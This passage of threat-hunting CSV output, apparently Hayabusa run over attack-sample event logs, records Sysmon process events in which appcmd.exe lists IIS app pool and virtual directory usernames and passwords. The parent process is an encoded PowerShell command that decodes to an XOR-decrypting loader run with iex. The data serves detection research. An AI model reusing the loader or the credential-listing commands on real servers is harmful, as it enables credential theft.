OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2472 | PGUID: 365ABB72-3D6E-5CEB-0000-00104C83FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:18.121 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2896 | PGUID: 365ABB72-3D6E-5CEB-0000-00100C87FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:18.202 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2524 | PGUID: 365ABB72-3D6E-5CEB-0000-0010CC8AFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:18.282 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3144 | PGUID: 365ABB72-3D6E-5CEB-0000-00108C8EFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:18.352 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3100 | PGUID: 
365ABB72-3D6E-5CEB-0000-00104C92FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:18.432 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3136 | PGUID: 365ABB72-3D6E-5CEB-0000-00100C96FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:18.522 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 344 | PGUID: 365ABB72-3D6E-5CEB-0000-0010CC99FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:18.662 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool "". 
)"" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3756 | PGUID: 365ABB72-3D6E-5CEB-0000-0010EF9EFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:18.742 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool "". )"" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3812 | PGUID: 365ABB72-3D6E-5CEB-0000-0010AFA2FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:18.822 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:vdir.name | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 1876 | PGUID: 365ABB72-3D6E-5CEB-0000-00106FA6FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:18.893 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""ERROR ( message:Configuration error "" /text:userName | Process: 
C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3304 | PGUID: 365ABB72-3D6E-5CEB-0000-00102FAAFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:18.973 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""ERROR ( message:Configuration error "" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2276 | PGUID: 365ABB72-3D6E-5CEB-0000-0010EFADFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:19.063 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 1508 | PGUID: 365ABB72-3D6F-5CEB-0000-0010A6B1FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:19.143 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent 
Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2796 | PGUID: 365ABB72-3D6F-5CEB-0000-001066B5FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:19.233 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Filename: redirection.config"" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZAB
lAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 1036 | PGUID: 365ABB72-3D6F-5CEB-0000-001026B9FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:19.323 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Filename: redirection.config"" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 168 | PGUID: 
365ABB72-3D6F-5CEB-0000-00108FBFFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:19.403 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2484 | PGUID: 365ABB72-3D6F-5CEB-0000-00104FC3FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:19.473 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2168 | PGUID: 365ABB72-3D6F-5CEB-0000-00100FC7FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:19.563 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Line Number: 0"" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3892 | PGUID: 
365ABB72-3D6F-5CEB-0000-0010CFCAFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:19.784 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Line Number: 0"" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3844 | PGUID: 365ABB72-3D6F-5CEB-0000-0010F2CFFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:19.894 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3848 | PGUID: 365ABB72-3D6F-5CEB-0000-0010B2D3FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:19.964 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3640 | PGUID: 
365ABB72-3D6F-5CEB-0000-001072D7FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:20.034 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Description: Cannot read configuration file due to insufficient permissions"" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 1900 | PGUID: 365ABB72-3D6F-5CEB-0000-001032DBFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:20.124 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Description: Cannot read configuration file due to insufficient permissions"" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2772 | PGUID: 365ABB72-3D70-5CEB-0000-0010F2DEFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:20.204 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 
| LID: 0x82423 | PID: 2108 | PGUID: 365ABB72-3D70-5CEB-0000-0010B2E2FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:20.305 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2640 | PGUID: 365ABB72-3D70-5CEB-0000-001072E6FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:20.435 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir "". )"" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 1004 | PGUID: 365ABB72-3D70-5CEB-0000-001032EAFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:20.555 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir "". 
